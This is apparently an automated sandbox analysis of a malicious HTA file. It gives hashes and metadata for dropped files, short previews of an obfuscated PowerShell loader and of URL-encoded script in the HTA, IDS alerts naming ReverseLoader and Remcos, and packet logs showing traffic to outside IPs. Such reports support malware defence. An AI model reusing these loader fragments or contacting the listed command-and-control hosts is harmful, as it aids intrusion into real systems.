                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.0.cs"
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3072
                                                                                                        Entropy (8bit):2.8357371096945596
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:etGSFPBe5ekrl8OUplkkyG2/etkZfwvVCbCZ0WI+ycuZhNCakSKPNnq:6+skr+OUoG2/RJwvwbCZX1ulCa3mq
                                                                                                        MD5:027A9954CB2A7A916D82FBBFCAADBD68
                                                                                                        SHA1:7466DAD77D543AFF995FE9F133BE504BCAFB2DAB
                                                                                                        SHA-256:202919D9D61276DC0860693AB32E11623CB6398C402A4624AA7F31BCB1762757
                                                                                                        SHA-512:14DCE4C03F0F01B7A9C4AF592F62B33F180D514D34D352E7DAAF5687A101B23196D67AB7EDA10B937A24EF420B4D16C8AD24342712D517F57C8A81E9EE6753D4
                                                                                                        Malicious:false
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X'ag...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....{.....{.......................................... :.....P ......L.........R.....[.....e.....g.....p...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.bx
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):876
                                                                                                        Entropy (8bit):5.305452149758617
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:KOuqd3ka6K2aNETa8Kax5DqBVKVrdFAMBJTH:yika6CNE+8K2DcVKdBJj
                                                                                                        MD5:9D73980D7891CB843FB8DFFF11F8FECA
                                                                                                        SHA1:BE1B6C1942D2EF34F661B9356FED9BD9E9CBB15E
                                                                                                        SHA-256:480CDBA1D202D7249AF067A9683540807ACB472E7309A06548CA29C1F291C595
                                                                                                        SHA-512:14C4CF4708BED61D38330C162D37207E9060FD752D871C3D90C7235277489C1D84F3253A7AE53BACA4F6326A70610F90DEEAF94C4ED4539A519229025393CA61
                                                                                                        Malicious:false
                                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3281), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):154104
                                                                                                        Entropy (8bit):3.8082312070089706
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:qPN5KVAyQa3DsbfgpYcPN5KVAyQa3DsbfgpYNPN5KVAyQa3DsbfgpYf:25YYgpj5YYgpY5YYgpm
                                                                                                        MD5:80C468CCCBC1D6AA31D066F64CE06B42
                                                                                                        SHA1:6276DA318E9EC1756DDA7D7C9E9B2C5F00D3FDA4
                                                                                                        SHA-256:79A186BD409CAF82E85361C6885FD71EE00BEA6968D85CB8C9B71535909FE411
                                                                                                        SHA-512:37FD56E6121926E15433636AFE449F7002DE7A5BE35C18F8855D2E24C3542EABD7533B2DDB363E49972DDCA03F3EDB5868BB944AC799FF2FCF245D6271BF6662
                                                                                                        Malicious:true
                                                                                                        Preview:...... . . . .....Z.L.G.N.h.N.l.g.K.p.i.h.R.b.o. .=. .".c.A.m.c.G.f.q.k.h.U.J.J.u.d.t.".....L.K.G.L.h.k.K.L.G.h.L.f.i.i.j. .=. .".i.L.C.m.p.Z.Z.m.p.Q.u.K.g.P.e.".....c.I.L.B.K.c.m.J.K.e.d.Z.k.d.U. .=. .".K.N.W.G.f.W.c.m.t.Z.k.n.f.i.L.".........G.i.l.P.Z.c.e.b.b.z.l.P.K.h.f. .=. .".R.z.h.K.O.h.P.j.S.G.W.i.c.c.W.".....c.N.m.d.x.l.e.W.f.p.L.h.G.O.p. .=. .".s.A.W.G.L.m.z.A.L.m.z.W.m.A.p.".....o.K.N.n.l.G.H.d.B.x.n.q.A.l.C. .=. .".x.j.A.z.K.j.i.G.Z.K.b.p.j.q.c.".....A.t.N.R.c.h.m.c.n.J.H.G.z.i.c. .=. .".L.h.c.Z.p.J.K.x.B.W.c.A.c.B.r.".....c.k.L.m.K.a.p.t.A.c.Z.h.p.G.W. .=. .".e.b.k.K.W.m.A.G.t.W.O.A.P.L.L.".....i.C.L.A.W.W.W.P.R.G.T.G.c.U.i. .=. .".i.W.m.W.d.a.U.P.f.K.K.x.a.c.N.".....L.o.I.p.p.q.k.h.L.J.f.h.C.i.L. .=. .".U.N.L.d.W.J.N.r.s.L.k.A.R.m.g.".....h.G.N.a.W.C.m.U.L.i.L.W.N.L.Q. .=. .".k.e.e.e.L.m.L.W.L.z.o.b.G.A.U.".....U.z.i.h.c.z.Z.W.e.I.N.i.W.l.P. .=. .".C.U.d.i.p.W.L.k.v.c.R.W.a.k.g.".....K.P.L.b.P.o.O.N.T.o.C.K.p.K.W. .=. .".s.f.n.k.H.b.G.R.m.k.K.O.f.G.H.".....L.l.g.W.P.B.k.L.
                                                                                                        File type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                                                        Entropy (8bit):2.6474747251710156
                                                                                                        TrID:
                                                                                                          File name:seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
                                                                                                          File size:147'715 bytes
                                                                                                          MD5:80636733be5c6936770df78c2298d639
                                                                                                          SHA1:0e9cd08975bff8b04e8e7671f13c2585c25796a5
                                                                                                          SHA256:9c4e6335372584e7b1e145fe9ac1eeb43c148ac9b98337a4629b817badc83eec
                                                                                                          SHA512:6518d2d47c9f724e9beeae9440ac82d379d51e8bd81970fe37b933f07e2ebe7e280c91c30202cf4c57776551ff2524d78bceb486a74a100472838d96500fa1a7
                                                                                                          SSDEEP:768:t1EuT0um2oum2uD5KUJDVUKhCTGVf/ACBzg2lw1/lEwUUKBqe/zg7szgmUM/ONvT:tF
                                                                                                          TLSH:46E35327C59B9838F5BBAEFFE33C9B2A51826E01F4CE854F055C09D42DE2547712CA68
                                                                                                          File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-17T07:22:04.164352+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.64970774.208.80.24880TCP
                                                                                                          2024-12-17T07:22:15.219733+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.649715TCP
                                                                                                          2024-12-17T07:22:34.406542+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649770104.21.84.67443TCP
                                                                                                          2024-12-17T07:22:34.828568+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.21.84.67443192.168.2.649770TCP
                                                                                                          2024-12-17T07:22:34.828568+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.21.84.67443192.168.2.649770TCP
                                                                                                          2024-12-17T07:22:35.787359+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.649770TCP
                                                                                                          2024-12-17T07:22:46.846421+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649781192.169.69.262430TCP
                                                                                                          2024-12-17T07:22:58.336073+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649808192.169.69.262430TCP
                                                                                                          2024-12-17T07:23:09.838732+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649837192.169.69.262430TCP
                                                                                                          2024-12-17T07:23:21.438169+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649864192.169.69.262430TCP
                                                                                                          2024-12-17T07:23:33.104616+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649893192.169.69.262430TCP
                                                                                                          2024-12-17T07:23:44.734225+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649920192.169.69.262430TCP
                                                                                                          2024-12-17T07:23:56.594727+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649948192.169.69.262430TCP
                                                                                                          2024-12-17T07:24:08.295942+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649977192.169.69.262430TCP
                                                                                                          2024-12-17T07:24:19.710724+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649995192.169.69.262430TCP
                                                                                                          2024-12-17T07:24:31.236430+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649996192.169.69.262430TCP
                                                                                                          2024-12-17T07:24:42.850727+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649997192.169.69.262430TCP
                                                                                                          2024-12-17T07:24:54.404510+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649998192.169.69.262430TCP
                                                                                                          2024-12-17T07:25:06.336610+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649999192.169.69.262430TCP
                                                                                                          2024-12-17T07:25:17.732093+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650000192.169.69.262430TCP
                                                                                                          2024-12-17T07:25:29.400873+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650001192.169.69.262430TCP
                                                                                                          2024-12-17T07:25:40.898648+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650003192.169.69.262430TCP
                                                                                                          2024-12-17T07:25:52.532172+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650004192.169.69.262430TCP
                                                                                                          2024-12-17T07:26:04.034079+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650005192.169.69.262430TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 17, 2024 07:22:02.888204098 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:03.008344889 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:03.010004997 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:03.015948057 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:03.135999918 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164150000 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164254904 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164268970 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164294004 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164309978 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164351940 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.164391041 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.164416075 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164439917 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164455891 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164458036 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.164469957 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164485931 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.164530993 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.164530993 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.164530993 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.284645081 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.284698009 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.284710884 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.284775019 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.288765907 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.288909912 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.356700897 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.356781960 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.356813908 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.356858015 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.360785961 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.360986948 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.361035109 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.361248016 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.369265079 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.369353056 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.369370937 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.369554043 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.377655983 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.377791882 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.377815962 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.377887011 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.386046886 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.386121035 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.386179924 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.386487007 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.394488096 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.394619942 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.394689083 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.394689083 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.402951956 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.403027058 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.403095007 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.403137922 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.411387920 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.411484957 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.411549091 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.419783115 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.419887066 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.420001984 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.420001984 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.428405046 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.428467989 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.428570986 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.428704023 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.436131001 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.436201096 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.436266899 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.436266899 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.548840046 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.548861027 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.548921108 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.551067114 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.551146030 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.551203012 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.551333904 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.555888891 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.555905104 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.555974960 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.560589075 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.560702085 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.560758114 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.560758114 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.565363884 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.565473080 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.565484047 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.565551996 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.570089102 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.570169926 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.570307970 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.570307970 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.574758053 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.574829102 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.574922085 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.574982882 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.579485893 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.579540968 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.579647064 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.579715967 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.584280968 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.584340096 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.584388971 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.584460974 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.588855028 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.588918924 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.589026928 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.593513966 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.593676090 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.593755007 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.593755007 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.598304033 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.598372936 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.598412037 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.598515987 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.602957010 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.603038073 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.603184938 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.607642889 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.607729912 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.607803106 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.607861042 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.612278938 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.612334967 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.612385035 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.612517118 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.616995096 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.617136955 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.740822077 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.741048098 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.741149902 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.742918968 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.742994070 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.743094921 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.746985912 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.747091055 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.747340918 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.751043081 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.751147032 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.751159906 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.751207113 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.755141020 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.755218983 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.755309105 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.755363941 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.759248972 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.759303093 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.759340048 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.759490013 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.763307095 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.763349056 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.763427973 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.763510942 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.767371893 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.767427921 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.767482042 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.767579079 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.771498919 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.771576881 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.771576881 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.771706104 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.775557041 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.775626898 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.775657892 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.775736094 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.779694080 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.779745102 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.779810905 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.779901981 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.783726931 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.783844948 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.783876896 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.783983946 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.787837982 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.787899971 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.787947893 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.787974119 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.791940928 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.792006969 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.792054892 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.792114973 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.796045065 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.796150923 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.796214104 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.796252966 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.800071001 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.800146103 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.800170898 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.800266027 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.804192066 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.804272890 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.804286957 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.804433107 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.808227062 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.808295965 CET4970780192.168.2.674.208.80.248
                                                                                                          Dec 17, 2024 07:22:04.808334112 CET804970774.208.80.248192.168.2.6
                                                                                                          Dec 17, 2024 07:22:04.808377981 CET4970780192.168.2.674.208.80.248
